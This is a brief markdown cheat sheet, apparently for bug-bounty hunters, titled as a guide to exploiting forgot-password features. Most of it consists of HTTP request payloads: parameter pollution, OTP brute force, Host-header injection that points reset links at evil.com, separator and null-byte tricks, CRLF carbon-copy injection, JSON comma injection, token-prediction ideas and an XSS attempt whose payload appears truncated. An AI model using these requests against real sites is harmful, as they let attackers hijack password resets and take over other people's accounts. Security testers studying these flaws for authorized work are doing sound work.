## Forgot Password Functionality ## Introduction Some common bugs in the forgot password / reset password functionality ## How to exploit 1. Parameter pollution ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com&email=hacker@mail.com ``` 2. Bruteforce the OTP code ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com&code=$123456$ ``` 3. Host header Injection ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com ``` to ``` POST /reset HTTP/1.1 Host: target.com X-Forwarded-Host: evil.com ... email=victim@mail.com ``` And the victim will receive the reset link with evil.com 4. Using separator in value of the parameter ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com,hacker@mail.com ``` ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com%20hacker@mail.com ``` ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com|hacker@mail.com ``` ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com%00hacker@mail.com ``` 5. No domain in value of the paramter ``` POST /reset HTTP/1.1 Host: target.com ... email=victim ``` 6. No TLD in value of the parameter ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail ``` 7. Using carbon copy ``` POST /reset HTTP/1.1 Host: target.com ... email=victim@mail.com%0a%0dcc:hacker@mail.com ``` 8. If there is JSON data in body requests, add comma ``` POST /newaccount HTTP/1.1 Host: target.com ... {"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"} ``` 9. Find out how the tokens generate - Generated based on TimeStamp - Generated based on the ID of the user - Generated based on the email of the user - Generated based on the name of the user 10. Try Cross-Site Scripting (XSS) in the form Sometimes the email is reflected in the forgot password page, try to use XSS payload ``` ""@gmail.com ``` ## References * [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) * [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)